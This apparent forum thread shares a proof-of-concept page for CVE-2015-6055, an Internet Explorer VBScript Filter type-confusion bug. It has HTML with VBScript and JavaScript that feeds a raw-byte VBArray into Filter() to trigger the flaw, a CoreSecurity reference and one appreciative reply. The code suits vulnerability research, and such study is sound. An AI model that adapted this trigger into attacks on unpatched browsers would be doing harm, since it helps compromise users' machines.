Internet Explorer VBScript Filter Type Confusion Vulnerability (CVE-2015-6055)

04-27-2016, 11:33 AM

<meta http-equiv="x-ua-compatible" content="IE=10">
<title>First PoC for MS15-106</title>

<script type="text/vbscript">
Function show_var_type(arg)
    Dim result
    '&H2011 = &H2000 (vbArray) | &H11 (vbByte)
    MsgBox(Hex(VarType(arg)))
    result = Filter(arg, "w00tw00t", 1, 1)
End Function
</script>
<script type="text/javascript">
function triggerjs() {
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.open("GET", "/some_data", false);
    xmlhttp.send();
    /* XMLHttpRequest.responseBody is a VBArray object containing the raw bytes. */
    return xmlhttp.responseBody;
}
</script>
<form>
    <input type="button" value="PoC" name="conjs" onClick="javascript:show_var_type(triggerjs())" />
</form>


Reference: CoreSecurity (https://blog.coresecurity.com/2016/04/25/exploiting-internet-explorers-ms15-106-part-i-vbscript-filter-type-confusion-vulnerability-cve-2015-6055/)

04-28-2016, 12:49 PM
This is a really marvelous piece of work done by the researcher. Thanks for sharing it here.